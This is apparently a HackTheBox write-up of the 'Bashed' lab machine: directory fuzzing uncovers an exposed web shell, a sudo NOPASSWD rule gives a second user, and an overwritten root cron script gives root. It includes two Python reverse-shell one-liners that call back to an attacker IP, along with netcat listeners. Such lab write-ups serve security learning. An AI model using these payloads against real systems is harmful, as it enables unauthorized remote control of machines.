Post

Bashed

Walkthrough of the Bashed machine – directory fuzzing to a web shell, sudo NOPASSWD misconfiguration to pivot users, and a cron job script overwrite for root.

Bashed

Bashed - HackTheBox Writeup

Bashed is an easy Linux machine on HackTheBox. It relies on directory fuzzing to discover a web shell, then a sudo NOPASSWD misconfiguration to pivot to another user, and finally a root-owned cron job script that can be overwritten for privilege escalation.

Difficulty: Easy Operating System: Linux
Themes: Directory Fuzzing, Web Shell, Sudo Misconfig, Cron Job Abuse

Reconnaissance

Initial Port Scanning

Port Scan:

1
nmap -sCV 10.129.54.29

Findings:

1
2
3
4
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site
  • Port 80: Apache httpd 2.4.18 (Ubuntu)

Enumeration Port 80

Browsing port 80 revealed a web application with a single hyperlink referencing “this exact server”:

alt text

Following the hyperlink redirected me to a page showing screenshots of a shell tool:

alt text

It looked like a web shell, but browsing to /uploads/phpbash.php directly returned a 404:

alt text


Initial Access

I ran feroxbuster to fuzz for directories and files:

1
feroxbuster -u http://10.129.54.29/ -d 3 -w common.txt

Findings:

alt text

  • /dev/phpbash.min.php
  • /dev/phpbash.php

Accessing /dev/phpbash.php gave me a working web shell:

alt text


Lateral Movement

Browsing to /home revealed two users:

alt text

  • arrexel – holds user.txt
  • scriptmanager – discovered to be useful later

Reverse Shell

Python was available on the target, so I used it to get a proper reverse shell:

1
python -c 'import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.17.196",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'

Started a listener and caught the shell:

1
2
3
rlwrap nc -nlvp 4444
Connection from 10.129.54.29:53804
www-data@bashed:/home$

Privilege Escalation

From www-data to scriptmanager

Checked sudo permissions:

1
2
3
4
5
6
7
sudo -l
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL

www-data can run any command as scriptmanager with no password:

1
2
3
www-data@bashed:/home$ sudo -u scriptmanager /bin/bash
sudo -u scriptmanager /bin/bash
scriptmanager@bashed:/home$

From scriptmanager to root

After gaining a shell as scriptmanager, I found a /scripts directory owned by that user:

alt text

It contained two files:

  1. test.py – a script that creates test.txt
  2. test.txt – owned by root, created by test.py

This suggested a root-owned cron job was periodically executing test.py. I overwrote test.py with a reverse shell payload:

1
echo 'import socket,subprocess,os;s=socket.socket();s.connect(("10.10.17.196",3030));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])' > test.py

Started a listener and waited for the cron job to trigger:

1
2
3
4
5
6
rlwrap nc -nlvp 3030
Connection from 10.129.54.29:44348
/bin/sh: 0: can't access tty; job control turned off
# cd ~
# ls
root.txt

Got a root shell. Solved – happy hacking!


Find me online:
• TryHackMe: t4t4r1s
• HackTheBox: t4t4r1s
• LinkedIn: Mustafa Eltayeb
• X: @mustafa_altayeb


This post is licensed under CC BY 4.0 by the author.